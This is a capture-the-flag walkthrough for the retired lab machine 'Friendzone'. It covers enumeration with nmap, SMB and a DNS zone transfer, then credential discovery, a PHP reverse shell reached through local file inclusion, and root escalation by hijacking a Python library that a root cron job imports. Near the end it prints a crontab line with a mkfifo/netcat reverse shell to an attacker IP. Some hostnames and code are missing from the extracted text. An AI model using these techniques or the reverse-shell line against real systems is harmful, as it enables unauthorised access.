Name: Friendzone
Release Date: 29 Sep 2018
Retire Date: 23 Feb 2019
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
Adamm 00 days, 02 hours, 48 mins, 46 seconds
no0ne 00 days, 03 hours, 04 mins, 31 seconds
Creator: askar
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./friendzone

$  nmap -sC -sV -oA ./friendzone
  Starting Nmap 7.80 ( ) at 2020-04-01 20:48 EDT
  Nmap scan report for
  Host is up (0.065s latency).
  Not shown: 993 closed ports
  21/tcp  open  ftp         vsftpd 3.0.3
  22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
  |   256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
  |_  256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
  53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
  | dns-nsid: 
  |_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
  80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: Friend Zone Escape software
  139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  443/tcp open  ssl/http    Apache httpd 2.4.29
  |_http-server-header: Apache/2.4.29 (Ubuntu)
  |_http-title: 404 Not Found
  | ssl-cert: Subject:
  | Not valid before: 2018-10-05T21:02:30
  |_Not valid after:  2018-11-04T21:02:30
  |_ssl-date: TLS randomness does not represent time
  | tls-alpn: 
  |_  http/1.1
  445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
  Service Info: Hosts: FRIENDZONE,; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

  Host script results:
  |_clock-skew: mean: -59m42s, deviation: 1h43m55s, median: 17s
  |_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
  | smb-os-discovery: 
  |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
  |   Computer name: friendzone
  |   NetBIOS computer name: FRIENDZONE\x00
  |   Domain name: \x00
  |   FQDN: friendzone
  |_  System time: 2020-04-02T03:49:33+03:00
  | smb-security-mode: 
  |   account_used: guest
  |   authentication_level: user
  |   challenge_response: supported
  |_  message_signing: disabled (dangerous, but default)
  | smb2-security-mode: 
  |   2.02: 
  |_    Message signing enabled but not required
  | smb2-time: 
  |   date: 2020-04-02T00:49:33
  |_  start_date: N/A

  Service detection performed. Please report any incorrect results at .
  Nmap done: 1 IP address (1 host up) scanned in 38.96 seconds

SMB, DNS, HTTP and HTTPS.  Let's start with web services and SMB.  A quick smbclient -L show us a few shares


  smbclient -L
  Enter WORKGROUP\kali's password:
          Sharename       Type      Comment
          ---------       ----      -------
          print$          Disk      Printer Drivers
          Files           Disk      FriendZone Samba Server Files /etc/Files
          general         Disk      FriendZone Samba Server Files
          Development     Disk      FriendZone Samba Server Files
          IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))
  SMB1 disabled -- no workgroup available


One interesting note is the Comment section on the Files share.  It shows the actual location which is CVE-2000-0649. The actual location is /etc/Files.  The web service on HTTP show us a static page and HTTPS shows not found

Let's try connecting to the SMB shares and see what's available.  We can connect to the general share and we find a creds.txt file there.

  smbclient -N \\\\\\general
  Try "help" to get a list of possible commands.
  smb: \> dir
    .                                   D        0  Wed Jan 16 15:10:51 2019
    ..                                  D        0  Wed Jan 23 16:51:02 2019
    creds.txt                           N       57  Tue Oct  9 19:52:42 2018
                  9221460 blocks of size 1024. 6458412 blocks available
  smb: \> get creds.txt
  getting file \creds.txt of size 57 as creds.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
  smb: \> exit
  kali@kali:~/Friendzone$ cat creds.txt
  creds for the admin THING:
We can't connect to Files and Development is empty.

That's everything we can do with SMB right now.  Let's try DNS.  The start page has an email address at so let's try zone transferring it for more info.

  dig axfr @

  ; > DiG 9.11.14-3-Debian > axfr @
  ;; global options: +cmd         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800         604800  IN      AAAA    ::1         604800  IN      NS      localhost.         604800  IN      A 604800 IN A      604800  IN      A 604800  IN      A         604800  IN      SOA     localhost. root.localhost. 2 604800 86400 2419200 604800
  ;; Query time: 64 msec
  ;; SERVER:
  ;; WHEN: Thu Apr 02 09:05:35 EDT 2020
  ;; XFR size: 8 records (messages 1, bytes 289)

Let's add to our HOSTS file and see if we can get to an HTTPS page.

After accepting the self-signed certificate, we have an HTTPS page!  Getting warmer.  Let's check the other sub-domains of uploads, hr, and administrator1. We can access uploads and administrator1, but HR fails with not found.  On the page, let's try the creds we found on the general share. We can log in and it tells us to visit dashboard.php.

If I'm following the logic correctly, we upload files in the Uploads page and can access it from the Administrator1 page.  The dashboard even gives us the handy identifiers of image_id and pagename.  I tried uploading php shell pages, but they all failed.  I wonder if we can manipulate one of those parameters to get a local file inclusion (LFI).  Let's try it.  Using smbclient -N \\\\\\Development we try putting the PHP-reverse-shell from Pentest Monkey onto the Development share.  Now to figure out how to execute it.  We know that Files is /etc/Files.  It stands to reason that Development is actually /etc/Development.  So, we would likely need to execute /etc/Development/phprs.php (I shortened the name for easier typeout).  Start a netcat listener and then see if that path is accessible in the pagename parameter.


Excellent!  www-data shell.  Move over to the target (either through python3 http.service or using SMB to Development and then moving it to /tmp).  The results are in the CherryTree file.  Digging through the output, I don't see anything that jumps out so let's check running processes with pspy.  After a few minutes, we see a cron job running as root.  Let's check that out.

  cat /opt/server_admin/

  import os
  to_address = ""
  from_address = ""

  print "[+] Trying to send email to %s"%to_address
  #command = ''' mailsend -to -from -ssl -port 465 -auth -smtp scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

  # I need to edit the script later
  # Sam ~ python developer
Looks like it just sends a mail message.  Nothing useful on its own, but if we combine it with lines 150 and 1338 of the LinEnum output, we see that we can modify that this script calls on.  Let's use that to hijack crontab.  Create an on your machine with this code, and then SMB put the new file into /etc/Development on the Target

  shell = '''
  * * * * * root rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1| nc 10.10.XX.XX 9991 > /tmp/f
  f = open('/etc/crontab','a')


Now we copy our over to /usr/lib/Python2.7/, start a netcat listener, and wait for the fireworks.  Kaboom.  Root shell.